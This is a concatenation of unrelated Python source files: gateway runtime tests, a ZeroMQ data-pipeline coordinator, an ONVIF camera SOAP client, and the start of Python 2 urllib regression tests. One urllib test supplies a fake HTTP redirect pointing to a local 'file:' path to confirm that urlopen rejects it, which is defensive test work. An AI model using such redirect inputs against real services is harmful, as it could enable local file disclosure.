inputs=DocumentArray([Document(text=f'client{client_id}-Request')]),
return_results=True,
)
NUM_PARALLEL_CLIENTS = 10
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_linear(
linear_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-pod2-client{client_id}-pod3'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': linear_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def test_grpc_gateway_runtime_lazy_request_access(linear_graph_dict, monkeypatch):
call_counts = multiprocessing.Queue()
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyNoDocAccessMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, 'grpc')
assert len(responses) > 0
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': 'grpc',
'port_in': port_in,
'graph_dict': linear_graph_dict,
'call_counts': call_counts,
'monkeypatch': monkeypatch,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
assert (
_queue_length(call_counts) == NUM_PARALLEL_CLIENTS * 2
) # request should be decompressed at start and end only
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_bifurcation(
bifurcation_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
# reducing is supposed to happen in the pods, in the test it will get a single doc in non deterministic order
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-pod3'
or responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-pod4-client{client_id}-pod5'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': bifurcation_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_gateway(
merge_graph_dict_directly_merge_in_gateway, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
pod1_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-merger'
in responses[0].docs[0].text
)
pod2_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-merger'
in responses[0].docs[0].text
)
assert pod1_path or pod2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': merge_graph_dict_directly_merge_in_gateway,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_last_pod(
merge_graph_dict_directly_merge_in_last_pod, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
pod1_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-merger-client{client_id}-pod_last'
in responses[0].docs[0].text
)
pod2_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-merger-client{client_id}-pod_last'
in responses[0].docs[0].text
)
assert pod1_path or pod2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': merge_graph_dict_directly_merge_in_last_pod,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_complete_graph_dict(
complete_graph_dict, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
# there are 3 incoming paths to merger, it could be any
assert (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-merger-client{client_id}-pod_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-pod3-client{client_id}-merger-client{client_id}-pod_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-pod4-client{client_id}-pod5-client{client_id}-merger-client{client_id}-pod_last'
== responses[0].docs[0].text
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': complete_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def _queue_length(queue: 'multiprocessing.Queue'):
# Pops elements from the queue and counts them
# Used if the underlying queue is sensitive to ordering
# This is used instead of multiprocessing.Queue.qsize() since it is not supported on MacOS
length = 0
while not queue.empty():
queue.get()
length += 1
return length
|
datageneratingpipeline_coordinator.py
|
import argparse
import logging
import random
from pathlib import Path
from tempfile import NamedTemporaryFile
from threading import Thread
import zmq
from buglab.data.deduplication import DuplicationIndex
from buglab.utils.logging import MetricProvider, configure_logging
LOGGER = logging.getLogger(__name__)
metric_provider = MetricProvider("DataGeneratingPipelineCoordinator")
def data_pipeline_proxy():
# This follows http://zguide.zeromq.org/py:chapter2#The-Dynamic-Discovery-Problem
context = zmq.Context.instance()
# Socket facing producers
frontend = context.socket(zmq.XPUB)
frontend.bind("tcp://*:5558")
# Socket facing consumers
backend = context.socket(zmq.XSUB)
backend.bind("tcp://*:5557")
zmq.proxy(frontend, backend)
raise Exception("Should never get here.")
if __name__ == "__main__":
configure_logging()
parser = argparse.ArgumentParser(description="Orchestrator to extract graphs and publish data.")
parser.add_argument(
"package_list_path",
type=str,
help="the path to a txt file containing the names of the packages to be considered",
)
parser.add_argument(
"--prometheus-server-port",
type=int,
default=8004,
help="The port where Prometheus metrics can be accessed.",
)
parser.add_argument(
"--enable-tracing",
action="store_true",
help="Set to enable recording tracing information.",
)
parser.add_argument(
"--work-distribution-server-port",
type=int,
default=5550,
help="Work distribution port.",
)
args = parser.parse_args()
LOGGER.info("Run args: %s", args)
metric_provider.start_server(args.prometheus_server_port)
metric_provider.set_tracing(args.enable_tracing)
proxy_thread = Thread(target=data_pipeline_proxy, name="data_publishing_proxy", daemon=True)
proxy_thread.start()
f = NamedTemporaryFile()
duplication_index = DuplicationIndex(Path(f.name))
duplication_server_thread = Thread(target=lambda: duplication_index.server(address="tcp://*:5555"), daemon=True)
duplication_server_thread.start()
all_packages = []
with open(args.package_list_path) as f:
for line in f.readlines():
pkg_name = line.strip()
if len(pkg_name) > 0:
all_packages.append(pkg_name)
package_counter = metric_provider.new_counter("published_packages")
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.bind(f"tcp://*:{args.work_distribution_server_port}")
while True: # Keep publishing forever
random.shuffle(all_packages)
for package in all_packages:
worker_id = socket.recv_string()
LOGGER.info(f"Worker `{worker_id}` asked for the next package to process. Sending `{package}`.")
socket.send_string(package)
package_counter.inc()
duplication_index.clear() # Reset duplication index
LOGGER.info(f"All packages have been distributed. Restarting from scratch.")
|
client.py
|
__version__ = '0.0.1'
import os.path
import urllib.request, urllib.parse, urllib.error
from urllib.parse import urlparse
from threading import Thread, RLock
import logging
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('suds.client').setLevel(logging.CRITICAL)
import suds.sudsobject
from suds.client import Client
from suds.wsse import Security, UsernameToken
from suds.cache import ObjectCache, NoCache
from suds_passworddigest.token import UsernameDigestToken
from suds.bindings import binding
binding.envns = ('SOAP-ENV', 'http://www.w3.org/2003/05/soap-envelope')
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES, NSMAP
#from suds.sax.date import *
import datetime as dt
# Ensure methods to raise an ONVIFError Exception
# when some thing was wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameDigestToken):
'''
UsernameDigestToken class, with a time offset parameter that can be adjusted;
This allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environements.
'''
def __init__(self, user, passw, dt_diff=None):
# Old Style class ... sigh ...
UsernameDigestToken.__init__(self, user, passw)
self.dt_diff = dt_diff
def setcreated(self, *args, **kwargs):
dt_adjusted = None
if self.dt_diff:
dt_adjusted = (self.dt_diff + dt.datetime.utcnow())
UsernameToken.setcreated(self, dt=dt_adjusted, *args, **kwargs)
self.created = self.created.isoformat()
class ONVIFService(object):
'''
Python Implemention for ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
'''
@safe_func
def __init__(self, addr, user, passwd, url,
cache_location='/tmp/suds', cache_duration=None,
encrypt=True, daemon=False, ws_client=None, no_cache=False, portType=None, dt_diff = None):
if not os.path.isfile(url):
raise ONVIFError('%s doesn`t exist!' % url)
if no_cache:
cache = NoCache()
else:
# Create cache object
# NOTE: if cache_location is specified,
# onvif must has the permission to access it.
cache = ObjectCache(location=cache_location)
# cache_duration: cache will expire in `cache_duration` days
if cache_duration is not None:
cache.setduration(days=cache_duration)
# Convert pathname to url
from urllib.parse import urljoin
self.url = urljoin('file:', urllib.request.pathname2url(url))
self.addr = addr
# Create soap client
if not ws_client:
self.ws_client = Client(url=self.url,
location=self.addr,
cache=cache,
port=portType,
headers={'Content-Type': 'application/soap+xml'})
else:
self.ws_client = ws_client
self.ws_client.set_options(location=self.addr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate wether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.set_wsse()
# Method to create type instance of service method defined in WSDL
self.create_type = self.ws_client.factory.create
@safe_func
def set_wsse(self, user=None, passwd=None):
''' Basic ws-security auth '''
if user:
self.user = user
if passwd:
self.passwd = passwd
security = Security()
if self.encrypt:
token = UsernameDigestTokenDtDiff(self.user, self.passwd, dt_diff=self.dt_diff)
else:
token = UsernameToken(self.user, self.passwd)
token.setnonce()
token.setcreated()
security.tokens.append(token)
self.ws_client.set_options(wsse=security)
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(sudsobject):
# Convert a WSDL Type instance into a dictionary
if sudsobject is None:
return { }
elif isinstance(sudsobject, list):
ret = [ ]
for item in sudsobject:
ret.append(Client.dict(item))
return ret
return Client.dict(sudsobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
elif isinstance(params, suds.sudsobject.Object):
params = ONVIFService.to_dict(params)
ret = func(**params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
'''
Call the real onvif Service operations,
See the offical wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
'''
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client.service, name))
class ONVIFCamera(object):
'''
Python Implemention ONVIF compliant device
This class integrates onvif services
adjust_time parameter allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environements.
Also, this cannot be used on AXIS camera, as every request is authenticated, contrary to ONVIF standard
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> mycam.ptz.GetConfiguration()
# Another way:
>>> ptz_service.GetConfiguration()
'''
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None }
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True }
def __init__(self, host, port ,user, passwd, wsdl_dir=None,
cache_location=None, cache_duration=None,
encrypt=True, daemon=False, no_cache=False, adjust_time=False):
if not os.path.isdir(wsdl_dir) :
wsdl_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "wsdl")
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.cache_location = cache_location
self.cache_duration = cache_duration
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
# Active service client container
self.services = { }
self.services_lock = RLock()
# Set addrs
self.update_addrs()
self.to_dict = ONVIFService.to_dict
def update_addrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time :
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day, cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt.set_wsse()
# Get XAddr of services on the device
self.addrs = { }
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name, capability in capabilities:
try:
if name.lower() in SERVICES:
ns = SERVICES[name.lower()]['ns']
self.addrs[ns] = capability['XAddr']
except Exception:
logger.exception('Unexcept service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.addrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = self.event.CreatePullPointSubscription().SubscriptionReference.Address
except:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in list(self.services.keys()):
addr = getattr(self.capabilities, sname.capitalize).XAddr
self.services[sname].ws_client.set_options(location=addr)
def update_auth(self, user=None, passwd=None):
changed = False
if user and user != self.user:
changed = True
self.user = user
if passwd and passwd != self.passwd:
changed = True
self.passwd = passwd
if not changed:
return
with self.services_lock:
for service in list(self.services.keys()):
self.services[service].set_wsse(user, passwd)
def get_service(self, name, create=True):
service = None
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name):
'''Returns addr and wsdl of specified service'''
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
addr = 'http://%s:%s/onvif/device_service' % (self.host, self.port)
return addr, wsdlpath
# Get other XAddr
addr = self.addrs.get(ns)
if not addr:
raise ONVIFError('Device doesn`t support service: %s' % name)
return addr, wsdlpath
def create_onvif_service(self, name, from_template=True, portType=None):
'''Create ONVIF service client'''
name = name.lower()
addr, wsdl_file = self.get_definition(name)
with self.services_lock:
svt = self.services_template.get(name)
# Has a template, clone from it. Faster.
if svt and from_template and self.use_services_template.get(name):
service = ONVIFService.clone(svt, addr, self.user,
self.passwd, wsdl_file,
self.cache_location,
self.cache_duration,
self.encrypt,
self.daemon,
no_cache=self.no_cache, portType=portType, dt_diff=self.dt_diff)
# No template, create new service from wsdl document.
# A little time-comsuming
else:
service = ONVIFService(addr, self.user, self.passwd,
wsdl_file, self.cache_location,
self.cache_duration, self.encrypt,
self.daemon, no_cache=self.no_cache, portType=portType, dt_diff=self.dt_diff)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, from_template=True):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', from_template)
def create_media_service(self, from_template=True):
return self.create_onvif_service('media', from_template)
def create_ptz_service(self, from_template=True):
return self.create_onvif_service('ptz', from_template)
def create_imaging_service(self, from_template=True):
return self.create_onvif_service('imaging', from_template)
def create_deviceio_service(self, from_template=True):
return self.create_onvif_service('deviceio', from_template)
def create_events_service(self, from_template=True):
return self.create_onvif_service('events', from_template)
def create_analytics_service(self, from_template=True):
return self.create_onvif_service('analytics', from_template)
def create_recording_service(self, from_template=True):
return self.create_onvif_service('recording', from_template)
def create_search_service(self, from_template=True):
return self.create_onvif_service('search', from_template)
def create_replay_service(self, from_template=True):
return self.create_onvif_service('replay', from_template)
def create_pullpoint_service(self, from_template=True):
return self.create_onvif_service('pullpoint', from_template, portType='PullPointSubscription')
def create_receiver_service(self, from_template=True):
return self.create_onvif_service('receiver', from_template)
|
test_urllib.py
|
"""Regresssion tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import sys
import mimetools
import tempfile
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), mimetools.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in os.environ.keys():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp('Hello!')
try:
fp = urllib.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp("""HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file:README
Connection: close
Content-Type: text/html; charset=iso-8859-1
""")
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assertIsInstance(result[1], mimetools.Message,
"did not get a mimetools.Message instance as "
"second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertIsInstance(count, int)
self.assertIsInstance(block_size, int)
self.assertIsInstance(total_size, int)
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
